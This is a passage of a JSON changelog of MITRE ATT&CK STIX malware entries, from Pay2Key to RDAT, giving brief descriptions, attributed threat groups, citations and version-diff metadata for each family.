\"old_value\": \"2025-04-16 20:38:54.785000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--77ca1aa3-280c-4b67-abaa-e8fb891a8f83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-04 15:12:14.805000+00:00", + "modified": "2025-04-25 14:43:48.585000+00:00", + "name": "Pay2Key", + "description": "[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0556", + "external_id": "S0556" + }, + { + "source_name": "ClearkSky Fox Kitten February 2020", + "description": "ClearSky. (2020, February 16). Fox Kitten \u2013 Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.", + "url": "https://www.clearskysec.com/fox-kitten/" + }, + { + "source_name": "Check Point Pay2Key November 2020", + "description": "Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.", + "url": "https://research.checkpoint.com/2020/ransomware-alert-pay2key/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pay2Key" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:48.585000+00:00\", \"old_value\": \"2025-04-16 20:38:18.273000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6c2550d5-a01a-4bbb-a004-6ead348ba623", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-07 15:11:17.444000+00:00", + "modified": "2025-04-25 14:43:41.735000+00:00", + "name": "Peppy", + "description": "[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0643", + "external_id": "S0643" + }, + { + "source_name": "Proofpoint Operation Transparent Tribe March 2016", + "description": "Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.", + "url": "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Peppy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:41.735000+00:00\", \"old_value\": \"2025-04-16 20:38:15.700000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ae9d818d-95d0-41da-b045-9cabea1ca164", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:35.780000+00:00", + "modified": "2025-04-25 14:44:24.120000+00:00", + "name": "PinchDuke", + "description": "[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0048", + "external_id": "S0048" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PinchDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:24.120000+00:00\", \"old_value\": \"2025-04-16 20:38:30.358000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b96680d1-5eb3-4f07-b95c-00ab904ac236", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:12.388000+00:00", + "modified": "2025-04-25 14:44:31.662000+00:00", + "name": "Pisloader", + "description": "[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0124", + "external_id": "S0124" + }, + { + "source_name": "Pisloader", + "description": "(Citation: Palo Alto DNS Requests)" + }, + { + "source_name": "Palo Alto DNS Requests", + "description": "Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pisloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:31.662000+00:00\", \"old_value\": \"2025-04-16 20:38:32.474000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 21:03:35.244000+00:00", + "modified": "2025-04-25 14:42:50.153000+00:00", + "name": "Pony", + "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0453", + "external_id": "S0453" + }, + { + "source_name": "Malwarebytes Pony April 2016", + "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pony" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Arie Olshtein, Check Point", + "Kobi Eisenkraft, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.153000+00:00\", \"old_value\": \"2025-04-16 20:37:58.346000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:39.406000+00:00", + "name": "Power Loader", + "description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0177", + "external_id": "S0177" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:39.406000+00:00\", \"old_value\": \"2025-04-16 20:37:55.103000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:19.746000+00:00", + "modified": "2025-04-25 14:42:30.325000+00:00", + "name": "PowerDuke", + "description": "[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0139", + "external_id": "S0139" + }, + { + "source_name": "PowerDuke", + "description": "(Citation: Volexity PowerDuke November 2016)" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:30.325000+00:00\", \"old_value\": \"2025-04-16 20:37:51.754000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--53486bc7-7748-4716-8190-e4f1fde04c53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-08 19:27:12.414000+00:00", + "modified": "2025-04-25 14:43:19.493000+00:00", + "name": "PowerShower", + "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0441", + "external_id": "S0441" + }, + { + "source_name": "Unit 42 Inception November 2018", + "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/" + }, + { + "source_name": "Kaspersky Cloud Atlas August 2019", + "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.", + "url": "https://securelist.com/recent-cloud-atlas-activity/92016/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerShower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.493000+00:00\", \"old_value\": \"2025-04-16 20:38:07.537000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--dcac85c1-6485-4790-84f6-de5e6f6b91dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-21 17:23:27.855000+00:00", + "modified": "2025-04-25 14:44:50.859000+00:00", + "name": "PowerStallion", + "description": "[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0393", + "external_id": "S0393" + }, + { + "source_name": "ESET Turla PowerShell May 2019", + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PowerStallion" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:50.859000+00:00\", \"old_value\": \"2025-04-16 20:38:38.238000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--c541efb4-e7b1-4ad6-9da8-b4e113f5dd42", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:38.517000+00:00", + "name": "Proton", + "description": "[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0279", + "external_id": "S0279" + }, + { + "source_name": "Proton", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Proton" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:38.517000+00:00\", \"old_value\": \"2025-04-16 20:38:34.550000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--069af411-9b24-4e85-b26c-623d035bbe84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:34.849000+00:00", + "name": "Proxysvc", + "description": "[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0238", + "external_id": "S0238" + }, + { + "source_name": "Proxysvc", + "description": "(Citation: McAfee GhostSecret)" + }, + { + "source_name": "McAfee GhostSecret", + "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Proxysvc" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:34.849000+00:00\", \"old_value\": \"2025-04-16 20:37:53.139000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--dfb5fa9b-3051-4b97-8035-08f80aef945b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:53.268000+00:00", + "modified": "2025-04-25 14:44:53.196000+00:00", + "name": "Psylo", + "description": "[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0078", + "external_id": "S0078" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Psylo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:53.196000+00:00\", \"old_value\": \"2025-04-16 20:38:39.039000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a19c1197-9414-46e3-986f-0f609ff4a46b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-01 19:44:27.287000+00:00", + "modified": "2025-04-25 14:44:15.316000+00:00", + "name": "Pysa", + "description": "[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0583", + "external_id": "S0583" + }, + { + "source_name": "Pysa", + "description": "(Citation: CERT-FR PYSA April 2020)(Citation: DFIR Pysa Nov 2020)(Citation: NHS Digital Pysa Oct 2020)" + }, + { + "source_name": "Mespinoza", + "description": "(Citation: CERT-FR PYSA April 2020)(Citation: DFIR Pysa Nov 2020)(Citation: NHS Digital Pysa Oct 2020)" + }, + { + "source_name": "CERT-FR PYSA April 2020", + "description": "CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.", + "url": "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf" + }, + { + "source_name": "DFIR Pysa Nov 2020", + "description": "THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.", + "url": "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/" + }, + { + "source_name": "NHS Digital Pysa Oct 2020", + "description": "NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pysa", + "Mespinoza" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:15.316000+00:00\", \"old_value\": \"2025-04-16 20:38:27.874000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8c553311-0baa-4146-997a-f79acef3d831", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:38.480000+00:00", + "modified": "2025-04-25 14:43:59.385000+00:00", + "name": "RARSTONE", + "description": "[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0055", + "external_id": "S0055" + }, + { + "source_name": "Aquino RARSTONE", + "description": "Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RARSTONE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.385000+00:00\", \"old_value\": \"2025-04-16 20:38:21.673000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:11.826000+00:00", + "name": "RATANKBA", + "description": "[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0241", + "external_id": "S0241" + }, + { + "source_name": "RATANKBA", + "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" + }, + { + "source_name": "Lazarus RATANKBA", + "description": "Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RATANKBA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.826000+00:00\", \"old_value\": \"2025-04-16 20:38:26.215000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-28 17:26:36.168000+00:00", + "modified": "2025-04-25 14:43:13.198000+00:00", + "name": "RDAT", + "description": "[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0495", + "external_id": "S0495" + }, + { + "source_name": "Unit42 RDAT July 2020", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RDAT" + ], + "x_mitre_attack_spec_version": 